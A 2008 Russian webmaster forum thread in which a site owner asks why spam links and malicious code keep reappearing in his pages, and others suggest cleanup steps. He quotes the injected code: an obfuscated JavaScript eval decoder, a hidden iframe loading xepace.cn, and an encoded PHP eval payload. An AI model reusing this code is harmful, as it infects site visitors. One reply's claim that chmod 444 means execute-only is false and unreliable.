- Поисковые системы
- Практика оптимизации
- Трафик для сайтов
- Монетизация сайтов
- Сайтостроение
- Социальный Маркетинг
- Общение профессионалов
- Биржа и продажа
- Финансовые объявления
- Работа на постоянной основе
- Сайты - покупка, продажа
- Соцсети: страницы, группы, приложения
- Сайты без доменов
- Трафик, тизерная и баннерная реклама
- Продажа, оценка, регистрация доменов
- Ссылки - обмен, покупка, продажа
- Программы и скрипты
- Размещение статей
- Инфопродукты
- Прочие цифровые товары
- Работа и услуги для вебмастера
- Оптимизация, продвижение и аудит
- Ведение рекламных кампаний
- Услуги в области SMM
- Программирование
- Администрирование серверов и сайтов
- Прокси, ВПН, анонимайзеры, IP
- Платное обучение, вебинары
- Регистрация в каталогах
- Копирайтинг, переводы
- Дизайн
- Usability: консультации и аудит
- Изготовление сайтов
- Наполнение сайтов
- Прочие услуги
- Не про работу
Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий
Постоянно в коде сайта нахожу кучу ссылок на доры. И постоянно в php код цепляется такая бяка. Пароль на фтп менял и нигде его не сохраняю, но всеравно как то пролазиет. Как это работает?
<body class="contentpane"><script language=JavaScript>function mwban(x){var l=x.length,b=1024,i,j,r,p=0,s=0,w=0,t=Array(63,0,38,55,37,5,19,4,3,28,0,0,0,0,0,0,61,12,47,62,34,23,25,16,57,22,41,40,35,29,20,21,14,8,31,46,11,33,52,50,10,9,2,0,0,0,0,32,0,13,36,17,53,51,60,39,1,54,49,18,42,6,15,26,45,48,44,43,30,56,7,58,27,59,24);for(j=Math.ceil(l/b);j>0;j--){r='';for(i=Math.min(l,b);i>0;i--,l--){{w|=(t[x.charCodeAt(p++)-48])<<s;if(s){r+=String.fromCharCode(161^w&255);w>>=8;s-=2}else{s=6}}}eval(r);}}mwban('ILfe5yrdnXMd1EadkeJU4yfe7xK25yrqNeAjnE@LInaWO69DmiYWvnaqA69_n8Ae7eHq7nJqhX@VZeH_YEMdcBJLPopdI0KbcLrjk0QWnRrePIpLtoKDr89dY0uVP6@e5gQy1EMWnPaqnEreAgQDTZJ4cPF4QlKU86fbZxKDmPz_IL9jOgAgGkHbh2AjQx9WOeYbGPF_kEaia6Ag8IAWkvMe1L@2nyfe7nugMwQWvnaqA6fgmDQ')</script><!-- velasat.ru -->
roma095 добавил 07.05.2008 в 11:23
И вот еще:
<script language=JavaScript>function mwban(x){var l=x.length,b=1024,i,j,r,p=0,s=0,w=0,t=Array(63,0,38,55,37,5,19,4,3,28,0,0,0,0,0,0,61,12,47,62,34,23,25,16,57,22,41,40,35,29,20,21,14,8,31,46,11,33,52,50,10,9,2,0,0,0,0,32,0,13,36,17,53,51,60,39,1,54,49,18,42,6,15,26,45,48,44,43,30,56,7,58,27,59,24);for(j=Math.ceil(l/b);j>0;j--){r='';for(i=Math.min(l,b);i>0;i--,l--){{w|=(t[x.charCodeAt(p++)-48])<<s;if(s){r+=String.fromCharCode(161^w&255);w>>=8;s-=2}else{s=6}}}eval(r);}}mwban('ILfe5yrdnXMd1EadkeJU4yfe7xK25yrqNeAjnE@LInaWO69DmiYWvnaqA69_n8Ae7eHq7nJqhX@VZeH_YEMdcBJLPopdI0KbcLrjk0QWnRrePIpLtoKDr89dY0uVP6@e5gQy1EMWnPaqnEreAgQDTZJ4cPF4QlKU86fbZxKDmPz_IL9jOgAgGkHbh2AjQx9WOeYbGPF_kEaia6Ag8IAWkvMe1L@2nyfe7nugMwQWvnaqA6fgmDQ')</script><!-- velasat.ru -->
</body>
</html><script language=javascript>status=location;document.write('<iframe src="http://xepace.cn/tdska/index.php" width=0 height=0 frameborder=0 onLoad="status=defaultStatus;"></iframe>');</script>
<?php eval(gzinflate(base64_decode("nZJBboNADEWvghBSoFGpmWHcRARyg0hdV+1oCk6hJQENDgmLhquXRZdBirq09e3/vmXvGwgHpVmWYICFjjvM0apKtsCgRTXVWuXSwgCt4JiwkGn0nHgWSXbQxCewKgfSubA4SZAVyULn0EAhKE7dx9AMJrqco/XL+Wp4XONAZJZZVrFpLW/tmDlO5mAaTb6r1Rfb4RqdLz+865l29joSj/Sxljen5OqhjsInN/E6YGWhEkf81A2eJEM7oTGmd4ImXo0UHwVDqRvY6ymxGnC6QUziTyVJpR3bmo7+rF2QeIS9MFDrVpXQ6hwbWcB0iMUi2TfW98pJV8keDRxUD50gPKSQ3Gpv7kK6ObpcBjMcTpg6eWn9xhbzKV5v7XwLnHfH+8e7BAn1pvbdbeaGM1Shu9m6QfIL"))); ?>
Нормальное явление. Ищи у себя на хосте левые или измененные скрипты которые такую бяку делают.
Еще как вариант, временно можешь прописать chmod 555 * через SSH чтобы твои скрипты в процессе поиска вредины не изменялись.
neolord добавил 07.05.2008 в 11:59
Работает то кстати очень просто, яваскрипт генерит из массива кусок кода и выполняет.
А пхпшный код наверное этот яваскрипт и втыкает.
привет, буквально неделю назад занимался удалением аналогичного кода,
который прилепился к страницам PHP после окончания тега </html>
причем, судя по дате обновления страниц, происходило это регулярно
"оптом" в районе 5.20 утра....
- поменял все пароли...
- скачал AVAST Home Edition (бесплатная регистрация на сайте avast.com)
- скачал TrojanRemover
- почистился на компе
- поудалял ручками "прицепленные коды"...
- обновил по FTP
- потом всем страницам поставил CHMOD - 444 (только чтение)
Где "собака порылась" - не берусь утверждать, но сайт вторую неделю как ЖИВЕТ без этих
кодов....
Друг, 444 это только исполнение а не чтение.
Всякие трояны ремуверы здесь не при кухне, это проблема не клиентского компа. Файерволы или AVAST кстати тема чтобы больше этого не было, но уже имеющуюся проблему это не решит.
Тут просто надо проверить все скрипты, можно тупо сёрчем на наличие измененного кода и в т.ч. вот этой страшной закодированной строки в PHP